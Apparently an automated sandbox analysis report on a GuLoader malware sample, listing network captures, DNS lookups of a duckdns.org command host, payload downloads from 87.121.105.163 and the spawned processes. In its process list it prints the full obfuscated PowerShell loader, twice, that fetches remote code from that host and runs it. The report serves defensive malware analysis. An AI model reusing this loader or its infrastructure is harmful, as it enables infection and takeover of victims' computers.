                                            Apr 20, 2024 16:05:38.701906919 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.701926947 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.701926947 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.701936960 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.701946974 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.701963902 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.701967001 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.701982021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.701986074 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.701996088 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702001095 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702017069 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702020884 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702033043 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702042103 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702056885 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702060938 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702079058 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702080011 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702126980 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702140093 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702157021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702173948 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702184916 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702193022 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702197075 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702212095 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702229023 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702229023 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702239990 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702255964 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702255964 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702274084 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702281952 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702291965 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702306986 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702310085 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702328920 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702332020 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702346087 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702354908 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702366114 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702380896 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702383041 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702400923 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702415943 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702419996 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702426910 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702438116 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702455044 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702455997 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702474117 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702481031 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702492952 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702502012 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702505112 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702519894 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702524900 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702538013 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702548027 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702555895 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702572107 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702573061 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702584028 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702593088 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702609062 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702613115 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702626944 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702640057 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702646971 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702651024 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702665091 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702681065 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702682018 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702702045 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702704906 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702718973 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702729940 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702738047 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702744961 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702756882 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702766895 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702775002 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702780008 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702791929 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702810049 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702811003 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702821016 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702827930 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702830076 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702851057 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702863932 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702877045 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702882051 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702892065 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702908993 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702915907 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702927113 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702939034 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702944994 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702963114 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702970982 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702980995 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702984095 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703000069 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703012943 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703016996 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703021049 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703036070 CEST804971887.121.105.163192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2024 16:05:39.849409103 CEST | 59218 | 53 | 192.168.2.6 | 1.1.1.1
Apr 20, 2024 16:05:39.985280037 CEST | 53 | 59218 | 1.1.1.1 | 192.168.2.6
Apr 20, 2024 16:05:40.628751993 CEST | 51636 | 53 | 192.168.2.6 | 1.1.1.1
Apr 20, 2024 16:05:40.734426975 CEST | 53 | 51636 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 20, 2024 16:05:39.849409103 CEST | 192.168.2.6 | 1.1.1.1 | 0x392c | Standard query (0) | jgbours284hawara01.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 20, 2024 16:05:40.628751993 CEST | 192.168.2.6 | 1.1.1.1 | 0x37fd | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 20, 2024 16:05:39.985280037 CEST | 1.1.1.1 | 192.168.2.6 | 0x392c | No error (0) | jgbours284hawara01.duckdns.org | | 45.88.90.110 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 16:05:40.734426975 CEST | 1.1.1.1 | 192.168.2.6 | 0x37fd | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

                                            • 87.121.105.163
                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 87.121.105.163 | 80 | 6256 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Apr 20, 2024 16:05:06.582158089 CEST | 172 | OUT | GET /Belyves242.hhk HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Connection: Keep-Alive
Apr 20, 2024 16:05:06.779700994 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Sat, 20 Apr 2024 14:05:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 19 Apr 2024 15:02:17 GMT
ETag: "64284-616745fa61040"
Accept-Ranges: bytes
Content-Length: 410244
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49718 | 87.121.105.163 | 80 | 5776 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
Apr 20, 2024 16:05:37.686614990 CEST | 187 | OUT | GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Cache-Control: no-cache
Apr 20, 2024 16:05:37.889302015 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Sat, 20 Apr 2024 14:05:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 19 Apr 2024 13:56:34 GMT
ETag: "78c40-6167374a0a880"
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49721 | 178.237.33.50 | 80 | 5776 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
Apr 20, 2024 16:05:40.946173906 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 20, 2024 16:05:41.160156965 CEST | 1171 | IN | HTTP/1.1 200 OK
date: Sat, 20 Apr 2024 14:05:41 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                            Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



Target ID: 0
Start time: 16:05:02
Start date: 20/04/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
Imagebase: 0x7ff60af00000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 16:05:02
Start date: 20/04/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. 
conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: 
TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:16:05:02
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:16:05:05
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
                                            Imagebase:0x7ff6fdba0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:16:05:10
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. 
conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M 